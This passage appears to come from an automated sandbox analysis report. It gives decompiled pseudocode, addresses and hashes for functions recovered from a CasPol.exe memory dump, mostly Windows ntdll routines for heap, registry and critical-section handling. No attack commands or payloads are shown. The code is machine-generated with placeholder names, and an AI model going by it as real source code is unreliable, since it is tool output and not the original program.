				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01433884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E013FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E013F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01433787(_a4,  &_v352, _t80);
						}
					}
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E013F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                        0x01433552
                                                                        0x0143355a
                                                                        0x0143355d
                                                                        0x01433566
                                                                        0x01433567
                                                                        0x0143357e
                                                                        0x0143358f
                                                                        0x014335a1
                                                                        0x014335a5
                                                                        0x0143366b
                                                                        0x0143366b
                                                                        0x0143366d
                                                                        0x01433672
                                                                        0x01433679
                                                                        0x01433685
                                                                        0x0143368d
                                                                        0x0143369d
                                                                        0x014336a7
                                                                        0x014336b8
                                                                        0x014336c6
                                                                        0x014336c7
                                                                        0x014336dc
                                                                        0x014336e1
                                                                        0x014336e7
                                                                        0x014336e9
                                                                        0x014336e9
                                                                        0x01433703
                                                                        0x01433703
                                                                        0x014335b5
                                                                        0x014335c0
                                                                        0x014335c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014335ca
                                                                        0x014335d7
                                                                        0x014335e2
                                                                        0x014335e6
                                                                        0x014335e8
                                                                        0x014335f5
                                                                        0x014335fa
                                                                        0x01433603
                                                                        0x01433604
                                                                        0x01433609
                                                                        0x0143360a
                                                                        0x01433612
                                                                        0x01433613
                                                                        0x0143361e
                                                                        0x01433622
                                                                        0x01433628
                                                                        0x0143362f
                                                                        0x0143362f
                                                                        0x01433636
                                                                        0x01433638
                                                                        0x0143363b
                                                                        0x01433642
                                                                        0x01433642
                                                                        0x01433636
                                                                        0x01433657
                                                                        0x01433657
                                                                        0x0143365c
                                                                        0x01433662
                                                                        0x01433669
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: d3f913109addf4e1116d0d7a26b0af93f3fc89f57449273ea6e16303ee65ed3f
                                                                        • Instruction ID: 0d83d613fbc94fe84989ad212d66b9849aa1a22ef0f3d38e159f4f5cf384db61
                                                                        • Opcode Fuzzy Hash: d3f913109addf4e1116d0d7a26b0af93f3fc89f57449273ea6e16303ee65ed3f
                                                                        • Instruction Fuzzy Hash: 6B4124B2D0052D9FDB21DE54CC84FDEB77CAB54718F0045AAEB09AB250DB309E898F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014805AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E014805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E014807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E013F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0147A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0147A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01481293(_t79, _v40, E014807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E013D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0147138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                        0x014805c5
                                                                        0x014805ca
                                                                        0x014805d3
                                                                        0x014806db
                                                                        0x014806db
                                                                        0x014806dd
                                                                        0x014806e3
                                                                        0x014806e3
                                                                        0x014805dd
                                                                        0x014805e7
                                                                        0x014805f6
                                                                        0x01480600
                                                                        0x01480607
                                                                        0x01480610
                                                                        0x01480615
                                                                        0x0148061a
                                                                        0x0148061c
                                                                        0x0148061e
                                                                        0x01480624
                                                                        0x01480625
                                                                        0x01480627
                                                                        0x01480628
                                                                        0x01480631
                                                                        0x01480640
                                                                        0x0148064d
                                                                        0x01480654
                                                                        0x01480654
                                                                        0x01480631
                                                                        0x0148066d
                                                                        0x01480674
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01480692
                                                                        0x0148069e
                                                                        0x014806b0
                                                                        0x014806a0
                                                                        0x014806a9
                                                                        0x014806a9
                                                                        0x014806b8
                                                                        0x014806d6
                                                                        0x014806d6
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction ID: 2d2f7467898c3cfc52f5b1fd04ee70720acfb1c797ca860bfe20fb74f7ce45e0
                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction Fuzzy Hash: F23106322003066BE720EE29CC44F9B7BD9EBC4758F18412AFA58AB290D770E908C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01433884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E01433884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E013F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L013D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E013F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                        0x01433893
                                                                        0x01433896
                                                                        0x01433899
                                                                        0x0143389f
                                                                        0x014338a0
                                                                        0x014338a4
                                                                        0x014338a9
                                                                        0x014338ac
                                                                        0x014338ad
                                                                        0x014338ae
                                                                        0x014338af
                                                                        0x014338b1
                                                                        0x014338b4
                                                                        0x014338bb
                                                                        0x014338bc
                                                                        0x014338bd
                                                                        0x014338c4
                                                                        0x014338c8
                                                                        0x014338ca
                                                                        0x014338ca
                                                                        0x014338d5
                                                                        0x0143393e
                                                                        0x01433940
                                                                        0x01433942
                                                                        0x01433952
                                                                        0x01433954
                                                                        0x01433961
                                                                        0x01433961
                                                                        0x01433967
                                                                        0x0143396e
                                                                        0x0143396e
                                                                        0x01433947
                                                                        0x0143394c
                                                                        0x00000000
                                                                        0x0143394c
                                                                        0x014338ea
                                                                        0x014338ee
                                                                        0x014338f8
                                                                        0x014338f9
                                                                        0x014338ff
                                                                        0x01433900
                                                                        0x01433902
                                                                        0x01433903
                                                                        0x0143390b
                                                                        0x0143390f
                                                                        0x01433950
                                                                        0x00000000
                                                                        0x01433950
                                                                        0x01433915
                                                                        0x0143391d
                                                                        0x0143391d
                                                                        0x01433922
                                                                        0x01433926
                                                                        0x00000000
                                                                        0x01433928
                                                                        0x0143392b
                                                                        0x0143392b
                                                                        0x01433935
                                                                        0x01433937
                                                                        0x01433937
                                                                        0x00000000
                                                                        0x01433935
                                                                        0x01433926
                                                                        0x014338f0
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: 56cddd86c32f57c433653d0bb967b16c05bd7140f91e4691974df11bc824e87c
                                                                        • Instruction ID: 42e7885cb1256651fb9cb1eb902b84c4b5f54aef3f18c7bfdde9b863972fe1f2
                                                                        • Opcode Fuzzy Hash: 56cddd86c32f57c433653d0bb967b16c05bd7140f91e4691974df11bc824e87c
                                                                        • Instruction Fuzzy Hash: 3C31D43290151AEFEB15DE5CC945E7BBB74FF88B24F11416AE915A7360D6309E04CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013ED294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 33%
                                                                        			E013ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x14ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E013D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E013FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E013F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E013F95D0();
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                        0x013ed29c
                                                                        0x013ed2a6
                                                                        0x013ed2b1
                                                                        0x013ed2b5
                                                                        0x013ed2b6
                                                                        0x013ed2bc
                                                                        0x013ed2bd
                                                                        0x013ed2be
                                                                        0x013ed2bf
                                                                        0x013ed2c2
                                                                        0x013ed2c4
                                                                        0x013ed2cc
                                                                        0x013ed384
                                                                        0x013ed34b
                                                                        0x013ed34f
                                                                        0x013ed350
                                                                        0x013ed351
                                                                        0x013ed35c
                                                                        0x013ed35c
                                                                        0x013ed2d6
                                                                        0x013ed2da
                                                                        0x013ed2e1
                                                                        0x013ed361
                                                                        0x013ed369
                                                                        0x013ed36d
                                                                        0x013ed2e3
                                                                        0x013ed2e3
                                                                        0x013ed2e3
                                                                        0x013ed2e5
                                                                        0x013ed2ed
                                                                        0x013ed2f5
                                                                        0x013ed2fa
                                                                        0x013ed302
                                                                        0x013ed303
                                                                        0x013ed30b
                                                                        0x013ed30f
                                                                        0x013ed313
                                                                        0x013ed318
                                                                        0x013ed31c
                                                                        0x013ed320
                                                                        0x013ed379
                                                                        0x013ed37d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142affe
                                                                        0x0142b001
                                                                        0x0142b011
                                                                        0x00000000
                                                                        0x013ed322
                                                                        0x013ed322
                                                                        0x013ed330
                                                                        0x013ed337
                                                                        0x013ed35d
                                                                        0x013ed339
                                                                        0x013ed33f
                                                                        0x013ed38c
                                                                        0x013ed38c
                                                                        0x013ed33f
                                                                        0x013ed349
                                                                        0x00000000
                                                                        0x013ed349

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 9654a36cb0d38d930367b3123253709273f1a547392037d4cfa8fd2409405f7f
                                                                        • Instruction ID: 2cf851b789def27f74db9247094fab87f1e32088c4f569cdfd85b0c17747b7ce
                                                                        • Opcode Fuzzy Hash: 9654a36cb0d38d930367b3123253709273f1a547392037d4cfa8fd2409405f7f
                                                                        • Instruction Fuzzy Hash: F831C0B6508315DFC321DF6CD984AABBBE8EB89658F40092EF99483690D634DD05CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E013C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E013FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E013FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E013FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L013D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                        0x013c1b8f
                                                                        0x013c1b9a
                                                                        0x013c1b9c
                                                                        0x013c1b9e
                                                                        0x013c1ba3
                                                                        0x01417010
                                                                        0x01417010
                                                                        0x00000000
                                                                        0x013c1ba9
                                                                        0x013c1ba9
                                                                        0x013c1bae
                                                                        0x00000000
                                                                        0x013c1bc5
                                                                        0x013c1bca
                                                                        0x013c1bcf
                                                                        0x013c1bd0
                                                                        0x013c1bd1
                                                                        0x013c1bd2
                                                                        0x013c1bd6
                                                                        0x013c1bdc
                                                                        0x013c1be0
                                                                        0x01416ffc
                                                                        0x01417000
                                                                        0x00000000
                                                                        0x01417006
                                                                        0x01417009
                                                                        0x01417009
                                                                        0x013c1be6
                                                                        0x013c1bec
                                                                        0x013c1c0b
                                                                        0x013c1c0b
                                                                        0x013c1c0c
                                                                        0x013c1c11
                                                                        0x013c1c12
                                                                        0x013c1c15
                                                                        0x013c1c1b
                                                                        0x013c1c1f
                                                                        0x013c1c31
                                                                        0x013c1c33
                                                                        0x01417026
                                                                        0x01417026
                                                                        0x013c1c21
                                                                        0x013c1c24
                                                                        0x013c1c24
                                                                        0x013c1bee
                                                                        0x013c1bee
                                                                        0x013c1bf2
                                                                        0x013c1c3a
                                                                        0x013c1bf4
                                                                        0x013c1bf4
                                                                        0x013c1c05
                                                                        0x013c1c05
                                                                        0x013c1c09
                                                                        0x013c1c3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c1c09
                                                                        0x013c1bec
                                                                        0x013c1be0
                                                                        0x013c1bae
                                                                        0x013c1c2e

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WindowsExcludedProcs
                                                                        • API String ID: 0-3583428290
                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction ID: 0592ee5a6fa27101eb1932c09bf646e6e983fa4027898fb3eb232846d3427513
                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction Fuzzy Hash: 7E21CB77601219EBDF21DE5DC880F5BBBADAF41A59F05842AFA049B215D630DD01A7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                        0x013df71d
                                                                        0x013df722
                                                                        0x013df726
                                                                        0x01424770
                                                                        0x013df765
                                                                        0x013df769
                                                                        0x013df769
                                                                        0x013df732
                                                                        0x0142477a
                                                                        0x00000000
                                                                        0x0142477a
                                                                        0x013df738
                                                                        0x013df73a
                                                                        0x013df73c
                                                                        0x013df73f
                                                                        0x013df746
                                                                        0x013df778
                                                                        0x013df7a9
                                                                        0x013df7a9
                                                                        0x013df754
                                                                        0x013df75a
                                                                        0x013df75d
                                                                        0x013df75f
                                                                        0x013df761
                                                                        0x013df76f
                                                                        0x013df771
                                                                        0x013df771
                                                                        0x013df76f
                                                                        0x013df763
                                                                        0x00000000
                                                                        0x013df763
                                                                        0x013df77d
                                                                        0x013df7a3
                                                                        0x013df7a5
                                                                        0x00000000
                                                                        0x013df7a5
                                                                        0x013df77f
                                                                        0x013df782
                                                                        0x013df784
                                                                        0x013df786
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013df788
                                                                        0x013df748
                                                                        0x013df74d
                                                                        0x013df78d
                                                                        0x013df793
                                                                        0x013df7b7
                                                                        0x013df7bc
                                                                        0x00000000
                                                                        0x013df7bc
                                                                        0x013df798
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013df79d
                                                                        0x013df7b0
                                                                        0x00000000
                                                                        0x013df7b0
                                                                        0x013df79f
                                                                        0x00000000
                                                                        0x013df74f
                                                                        0x013df74f
                                                                        0x00000000
                                                                        0x013df74f

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: c7b41ea9c974a53f44c5ab11630871c996fa651ffcf64025a56e55d1e49bfd90
                                                                        • Instruction ID: ca2e3143b26527013dcea6e177f0ef694d20bfa9e3dc1e368c805e4cc432a4e1
                                                                        • Opcode Fuzzy Hash: c7b41ea9c974a53f44c5ab11630871c996fa651ffcf64025a56e55d1e49bfd90
                                                                        • Instruction Fuzzy Hash: 5011D0373046068BEB254E1CA8D07B6769DEB852ECF27452AE467CBB91DA70C8838340
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01468DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E01468DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1490d50);
				E0140D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01445720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0140DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0140DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0140D130(_t34, _t39, _t40);
			}





                                                                        0x01468df1
                                                                        0x01468df1
                                                                        0x01468df1
                                                                        0x01468df1
                                                                        0x01468df1
                                                                        0x01468df1
                                                                        0x01468df3
                                                                        0x01468df8
                                                                        0x01468dfd
                                                                        0x01468e00
                                                                        0x01468e0e
                                                                        0x01468e2a
                                                                        0x01468e36
                                                                        0x01468e38
                                                                        0x01468e3c
                                                                        0x01468e46
                                                                        0x01468e46
                                                                        0x01468e36
                                                                        0x01468e50
                                                                        0x01468e56
                                                                        0x01468e59
                                                                        0x01468e5c
                                                                        0x01468e60
                                                                        0x01468e67
                                                                        0x01468e6d
                                                                        0x01468e73
                                                                        0x01468e74
                                                                        0x01468eb1
                                                                        0x01468ebd

                                                                        Strings
                                                                        • Critical error detected %lx, xrefs: 01468E21
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Critical error detected %lx
                                                                        • API String ID: 0-802127002
                                                                        • Opcode ID: aab32fb683d6cd4f0d9b2406bcaad8429f1db4301753a79cf57bc454c51763a4
                                                                        • Instruction ID: 0b756c72d883ee95842738d4bd3416bef847b15855f658414960da4544ee1fee
                                                                        • Opcode Fuzzy Hash: aab32fb683d6cd4f0d9b2406bcaad8429f1db4301753a79cf57bc454c51763a4
                                                                        • Instruction Fuzzy Hash: 48117975D00349DBDF29CFEAC90579DBBB4AB14328F20422EE128AB3A2C3300606CF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0144FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0144FF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                        • API String ID: 0-1911121157
                                                                        • Opcode ID: e300a92aeda708ad22e03e0e9436d788789e8ffe42fc686927013b6244271a02
                                                                        • Instruction ID: 42bc90af559f21e9cfb81ffd868c9c08d66edbf2a470a4e00edb33c278a70400
                                                                        • Opcode Fuzzy Hash: e300a92aeda708ad22e03e0e9436d788789e8ffe42fc686927013b6244271a02
                                                                        • Instruction Fuzzy Hash: F111C071950244EFEF22DB98C959F99BBB1FF18704F55806AF1086B2B1CB399948CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BF900 Relevance: .9, Instructions: 863COMMONCrypto
                                                                        Download Yara Rule
